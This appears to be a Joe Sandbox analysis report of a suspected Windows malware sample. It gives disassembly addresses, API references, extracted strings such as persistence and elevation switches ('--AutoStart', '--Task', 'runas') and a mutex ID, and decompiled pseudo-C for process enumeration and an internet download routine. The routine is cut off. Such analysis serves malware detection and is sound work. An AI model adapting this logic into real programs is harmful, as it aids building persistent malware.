0x0041b673
0x0041b678
0x0041b67d
0x0041b67e
0x0041b67f
0x0041b680
0x0041b681
0x0041b683
0x0041b68a
0x0041b692
0x0041b697
0x0041b697
0x0041b69a
0x0041b6a4
0x0041b6ae
0x0041b6b5
0x0041b6bc
0x0041b6c4
0x0041b6c9
0x0041b6c9
0x0041b6ce
0x0041b6d8
0x0041b6e2
0x0041b6e9
0x0041b6ef
0x0041b6f1
0x0041b6fa
0x0041b705
0x0041b70a
0x0041b70d
0x0041b717
0x0041b721
0x0041b721
0x0041b72b
0x0041b731
0x0041b733
0x0041b73c
0x0041b747
0x0041b74c
0x0041b74f
0x0041b759
0x0041b763
0x0041b763
0x0041b76d
0x0041b773
0x0041b775
0x0041b77e
0x0041b789
0x0041b78e
0x0041b791
0x0041b79b
0x0041b7a5
0x0041b7a5
0x0041b7af
0x0041b7b6
0x0041b7be
0x0041b7c3
0x0041b7c3
0x0041b7c8
0x0041b7d2
0x0041b7dc
0x0041b7e3
0x0041b7ea
0x0041b7f2
0x0041b7f7
0x0041b7f7
0x0041b7fc
0x0041b806
0x0041b810
0x0041b817
0x0041b81e
0x0041b826
0x0041b82b
0x0041b82b
0x0041b830
0x0041b83a
0x0041b844
0x0041b84b
0x0041b852
0x0041b85a
0x0041b85f
0x0041b85f
0x0041b864
0x0041b86e
0x0041b878
0x0041b87f
0x0041b883
0x0041b888
0x0041b88d
0x0041b890
0x0041b897
0x0041b899
0x0041b8a0
0x0041b8a5
0x0041a065
0x0041a06d
0x0041a073
0x0041a079
0x0041a07b
0x0041a08f
0x0041a099
0x0041a09d
0x0041a09f
0x0041a0a3
0x0041a0a7
0x0041a0ac
0x0041a0bb
0x0041a0c2
0x0041a0c8
0x0041a0ce
0x0041a0e7
0x0041a0f3
0x0041a0fb
0x0041a100
0x0041a10a
0x0041a10c
0x0041a10e
0x0041a112
0x0041a116
0x0041a11b
0x0041a11b
0x0041a11e
0x0041a120
0x0041a127
0x0041a130
0x0041a13b
0x0041a13b
0x0041a140
0x0041a148
0x0041a151
0x0041a156
0x0041a156
0x0041a159
0x0041a16d
0x0041a173
0x0041a181
0x0041a187
0x0041a18c
0x0041a190
0x0041a33d
0x0041a341
0x0041a347
0x0041a34e
0x0041a45c
0x0041a461
0x0041a354
0x0041a359
0x0041a359
0x0041a464
0x0041a48a
0x0041a48f
0x0041a493
0x0041a496
0x0041a4a1
0x0041a4a1
0x0041a4a3
0x0041a4ae
0x0041a4b6
0x0041a4b6
0x0041a4b9
0x0041a4bc
0x0041a4c2
0x0041a4c7
0x0041a4d0
0x0041a4d0
0x0041a4d2
0x0041a4d3
0x0041a4d3
0x0041a4d7
0x0041a4d7
0x0041a4be
0x0041a4be
0x0041a4be
0x0041a4db
0x0041a4e4
0x0041a4e9
0x0041a4ea
0x0041a4ea
0x0041a4ef
0x0041a4fe
0x0041a506
0x0041a50c
0x0041a51b
0x0041a529
0x0041a531
0x0041a538
0x0041a547
0x0041a553
0x0041a55e
0x0041a563
0x0041a567
0x0041a56a
0x0041a56e
0x0041a570
0x0041a6ea
0x0041a6ea
0x0041a576
0x0041a576
0x0041a578
0x00000000
0x0041a57e
0x0041a580
0x0041a588
0x0041a58b
0x0041a59b
0x0041a5a4
0x0041a5af
0x0041a5b2
0x0041a5b6
0x0041a5b8
0x0041a5bf
0x0041a5c7
0x0041a5cf
0x0041a5d6
0x0041a5db
0x0041a5de
0x0041a5e3
0x0041a5e9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5f1
0x0041a578
0x0041a5f5
0x0041a602
0x0041a6f9
0x0041a6f9
0x00000000
0x0041a608
0x0041a608
0x0041a60a
0x0041a702
0x0041a702
0x0041a709
0x00000000
0x0041a70f
0x0041a70f
0x0041a711
0x0041a717
0x0041a719
0x0041a72a
0x0041a72f
0x0041a733
0x0041a736
0x0041a741
0x0041a741
0x0041a743
0x0041a74e
0x0041a752
0x0041a752
0x0041a755
0x0041a758
0x0041a75e
0x0041a760
0x0041a763
0x0041a763
0x0041a765
0x0041a766
0x0041a766
0x0041a76a
0x0041a76a
0x0041a75a
0x0041a75a
0x0041a75a
0x0041a76c
0x0041a775
0x0041a77a
0x0041a77b
0x0041a77b
0x0041a784
0x0041a788
0x0041a78e
0x0041a790
0x0041a792
0x0041a797
0x0041a797
0x0041a7bb
0x0041a7c1
0x0041a7c9
0x0041a7ce
0x0041a7d4
0x0041a7d9
0x0041a7d9
0x0041a7ce
0x0041a719
0x0041a7e7
0x0041a7ec
0x0041a7ef
0x0041a7ef
0x0041a7f1
0x0041a7f1
0x0041a7f9
0x0041a803
0x0041a813
0x0041a819
0x0041a81e
0x0041a82f
0x0041a83b
0x0041a841
0x0041a842
0x0041a842
0x0041a852
0x0041a854
0x0041a85b
0x0041a87a
0x0041a886
0x0041a88c
0x0041a895
0x0041a89a
0x0041a89a
0x0041a8af
0x0041a8af
0x00000000
0x0041a610
0x0041a610
0x0041a612
0x00000000
0x0041a618
0x0041a618
0x0041a61e
0x0041a8b6
0x0041a8c5
0x0041a8ca
0x0041a8d5
0x0041a8da
0x0041a8de
0x0041a8e1
0x0041a8ec
0x0041a8ec
0x0041a8ee
0x0041a8f9
0x0041a901
0x0041a901
0x0041a904
0x0041a907
0x0041a90d
0x0041a90f
0x0041a912
0x0041a912
0x0041a914
0x0041a915
0x0041a915
0x0041a919
0x0041a919
0x0041a909
0x0041a909
0x0041a909
0x0041a91b
0x0041a924
0x0041a929
0x0041a92a
0x0041a92a
0x0041a92f
0x0041a932
0x0041a93a
0x0041a93c
0x0041a944
0x0041a94b
0x0041a952
0x0041a955
0x0041a95c
0x0041a962
0x0041a967
0x0041a967
0x0041a970
0x0041a970
0x0041a973
0x0041a976
0x0041a976
0x0041a97b
0x0041a97b
0x0041a97d
0x0041a95e
0x0041a95e
0x0041a95e
0x0041a97f
0x0041a987
0x0041a992
0x0041a997
0x0041a99a
0x0041a99e
0x0041a9a0
0x0041a9a0
0x0041a9a6
0x0041a9ab
0x0041a9b0
0x0041a9b4
0x0041a9ba
0x0041a9bf
0x0041a9bf
0x0041a9c6
0x0041a9cc
0x0041a9cf
0x0041a9d8
0x0041a9dd
0x0041a9df
0x0041a9e1
0x0041a9e8
0x0041a9ef
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa04
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0a
0x0041aa0d
0x0041aa0d
0x0041aa12
0x0041aa12
0x0041aa14
0x0041a9fb
0x0041a9fb
0x0041a9fb
0x0041aa16
0x0041aa1e
0x0041aa29
0x0041aa2e
0x0041aa31
0x0041aa35
0x0041aa37
0x0041aa37
0x0041aa3e
0x0041aa44
0x0041aa49
0x0041aa4f
0x0041aa54
0x0041aa54
0x0041aa57
0x0041aa5f
0x0041aa65
0x0041aa6a
0x0041aa6a
0x0041aa70
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa76
0x0041aa7b
0x0041aa7b
0x0041aa7d
0x0041aa61
0x0041aa61
0x0041aa61
0x0041aa7f
0x0041aa8b
0x0041aa9b
0x0041aaa0
0x0041aaa4
0x0041aaa7
0x0041aab2
0x0041aab2
0x0041aab4
0x0041aabf
0x0041aac7
0x0041aac7
0x0041aaca
0x0041aacd
0x0041aad3
0x0041aad5
0x0041aad8
0x0041aad8
0x0041aada
0x0041aadb
0x0041aadb
0x0041aadf
0x0041aadf
0x0041aacf
0x0041aacf
0x0041aacf
0x0041aae1
0x0041aaea
0x0041aaef
0x0041aaf0
0x0041aaf0
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab07
0x0041ab0e
0x0041ab16
0x0041ab18
0x0041ab2c
0x0041ab2e
0x0041ab34
0x0041ab37
0x0041ab39
0x0041ab3b
0x0041ab3f
0x0041ab43
0x0041ab48
0x0041ab48
0x0041ab4d
0x0041ab54
0x0041ab5b
0x0041ab5e
0x0041ab62
0x0041ab7b
0x0041ab7d
0x0041ab64
0x0041ab67
0x0041ab67
0x0041ab68
0x0041ab6f
0x0041ab74
0x0041ab74
0x0041ab68
0x0041ab86
0x0041ab8c
0x0041ab8f
0x0041ab91
0x0041ab98
0x0041ab9f
0x0041ab9f
0x0041aba2
0x0041aba7
0x0041abad
0x0041abb2
0x0041abb2
0x0041abc0
0x0041abc5
0x0041abc9
0x0041abcc
0x0041abd7
0x0041abd7
0x0041abd9
0x0041abe4
0x0041abf0
0x0041abf0
0x0041abf3
0x0041abf6
0x0041abfc
0x0041abfe
0x0041ac01
0x0041ac01
0x0041ac03
0x0041ac04
0x0041ac04
0x0041ac08
0x0041ac08
0x0041abf8
0x0041abf8
0x0041abf8
0x0041ac0a
0x0041ac13
0x0041ac18
0x0041ac19
0x0041ac19
0x0041ac1e
0x0041ac28
0x0041ac2c
0x0041ac30
0x0041ac37
0x0041ac3f
0x0041ac41
0x0041ac55
0x0041ac57
0x0041ac5d
0x0041ac60
0x0041ac62
0x0041ac64
0x0041ac68
0x0041ac6c
0x0041ac71
0x0041ac71
0x0041ac76
0x0041ac7d
0x0041ac84
0x0041ac87
0x0041ac8b
0x0041aca4
0x0041aca6
0x0041ac8d
0x0041ac90
0x0041ac90
0x0041ac91
0x0041ac98
0x0041ac9d
0x0041ac9d
0x0041ac91
0x0041acaf
0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,008CCEB0,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

D:\Program Files\Google\, xrefs: 0041B0EE
C:\Windows\, xrefs: 0041AE0F
I:\5d2860c89d774.jpg, xrefs: 0041B32F
IsNotTask, xrefs: 0041A654
x2Q, xrefs: 0041A856
F:\, xrefs: 0041B397
X1P, xrefs: 0041A485
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
--Admin, xrefs: 0041A1B4, 0041A632
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
x*P, xrefs: 0041ACE4
IsAutoStart, xrefs: 0041A1D0, 0041A273
C:\Program Files\Google\, xrefs: 0041AFB9
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
IsTask, xrefs: 0041A1EE, 0041A299
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
--Task, xrefs: 0041A2CD
runas, xrefs: 0041A6CE
--AutoStart, xrefs: 0041A2EC
IsNotAutoStart, xrefs: 0041A645
D:\Windows\, xrefs: 0041AFF3
--Service, xrefs: 0041A30B
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
D:\Program Files (x86)\Google\, xrefs: 0041B085
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
list<T> too long, xrefs: 0041B669, 0041B673
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
<, xrefs: 0041A67B
7P, xrefs: 0041B164
%username%, xrefs: 0041B283
--ForNetRes, xrefs: 0041A22E
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: f861d408e3f0bd361e5407535fdbdb4c5b3297a71cc25ee421400f0b7a800433
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: f861d408e3f0bd361e5407535fdbdb4c5b3297a71cc25ee421400f0b7a800433
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

0x00412228
0x0041222f
0x00412232
0x00412253
0x00412262
0x00412272
0x0041227d
0x00412282
0x00412285
0x0041228a
0x00412291
0x00412297
0x004122a7
0x004122b2
0x004122b7
0x004122ba
0x004122ba
0x004122cd
0x004122d1
0x004122e2
0x004122e4
0x004122e7
0x004122ec
0x004122f0
0x00412304
0x00412308
0x0041230d
0x0041230e
0x00412313
0x00412314
0x0041231a
0x0041232c
0x00412339
0x0041233e
0x00412343
0x00412345
0x00412345
0x00412343
0x0041231a
0x00412347
0x0041234d
0x0041234e
0x004122f0
0x0041235b
0x004122d5
0x004122de
0x004122de

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

EnumProcesses, xrefs: 00412264, 00412299
kernel32.dll, xrefs: 0041224E
EnumProcessModules, xrefs: 0041226C, 004122A1
GetModuleBaseNameW, xrefs: 00412277, 004122AC
Psapi.dll, xrefs: 0041228C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
